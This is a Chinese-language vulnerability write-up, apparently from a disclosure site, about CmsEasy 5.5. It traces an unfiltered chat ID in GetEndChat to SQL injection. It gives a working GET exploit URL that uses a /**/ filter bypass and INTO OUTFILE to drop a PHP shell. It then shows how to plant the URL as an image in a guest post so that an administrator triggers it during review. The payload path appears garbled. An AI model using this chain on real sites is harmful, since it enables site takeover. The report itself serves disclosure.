### 简要描述:
上一次做了一个csrf+sql注入getshell的 这一次我继续发一个,由于此属于一个get类型的,所以很简单的,管理员根本就不用去点击,就能触发sql并且getshell
### 详细说明:
首先我们分析一下sql语句:
admin/live/header.php:(line:16-21)
```
include('../../include/config.inc.php');
include(CE_ROOT.'/include/admin/check.inc.php');
include(CE_ROOT.'/include/celive.class.php');
$admin_header = new celive();
$admin_header->template();
$admin_header->admin_xajax_live();
```
然后我们跟到admin_xajax_live这个函数里面看看:
```
function admin_xajax_live() {
if (!$this->admin_xajax_live_flag) {
$this->admin_xajax_live_flag=true;
include_once(dirname(__FILE__).'/xajax.inc.php');
include_once(dirname(__FILE__).'/xajax.class.php');
global $admin_xajax_live;
$admin_xajax_live=new xajax();
$admin_xajax_live->setCharEncoding('utf-8');
$admin_xajax_live->decodeUTF8InputOn();
$admin_xajax_live->registerFunction('ChangeStatus');
$admin_xajax_live->registerFunction('AdminResponse');
$admin_xajax_live->registerFunction('AdminSound');
$admin_xajax_live->registerFunction('AdminDecline');
$admin_xajax_live->registerFunction('AdminChatHistory');
$admin_xajax_live->registerFunction('AdminPostdata');
$admin_xajax_live->registerFunction('EndChats');
$admin_xajax_live->registerFunction('GetEndChat');
$admin_xajax_live->registerFunction('AdminExit');
$admin_xajax_live->processRequests();
}
}
```
看到注册函数这里了有一个GetEndChat:
```
function GetEndChat($chatid) {
global $db;
$objResponse = new xajaxResponse('utf-8');
$sql = "SELECT `status` FROM `chat` WHERE `id`='" . $chatid . "'";
@$result = $db->query($sql);
if ($result[0]['status'] == 0) {
$objResponse->script("alert('<?php echo $lang[reception]?>');window.parent.close();");
}
return $objResponse;
}
```
然而这个$chatid没有做任何过滤就被传递进来了,之前有人对这里前台进行分析过:
http://site.com/CmsEasy_5.5_UTF-8_20140818/uploads/celive/admin/live/header.php?xajax=GetEndChat&xajaxargs=xxxxx' union select/**/'<?php phpinfo?>' into outfile 'D:/APMSERVER/APMServ5.2.6/www/htdocs/CmsEasy_5.5_UTF-8_20140818/uploadshttps://images.seebug.org/upload/images/shell.php'#
这里我们要说明一下,由于全局对危险函数做了过滤和检测select后面要是不添加/**/这里是被拦截的
然后我们队此url进行url编码:
下来我们以游客身份进行投稿:
[<img src="https://images.seebug.org/upload/201409/0313063357b972f1c5753546b6196acd3a99154b.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/0313063357b972f1c5753546b6196acd3a99154b.png)
到这里大家应该就明白了,管理员是要审核的,我们这里把这个get链接,发给了一个图片,管理员审核的时候,看到图片其实我们的请求就已经发出去了,当然了在响应的目录下面也已经生成了,shellcode
[<img src="https://images.seebug.org/upload/201409/03130815fa31a5a01706ac553d50d81b883ed4de.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/03130815fa31a5a01706ac553d50d81b883ed4de.png)
我们再看看uploads/img底下有没有我们想要的文件:
[<img src="https://images.seebug.org/upload/201409/03130917d543aca1cb03a8a179d976cae246436f.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/03130917d543aca1cb03a8a179d976cae246436f.png)
对了这里差两个括号,补上就是了。。。。。。
ok到此.............
### 漏洞证明:
京公网安备 11010502034610号
暂无评论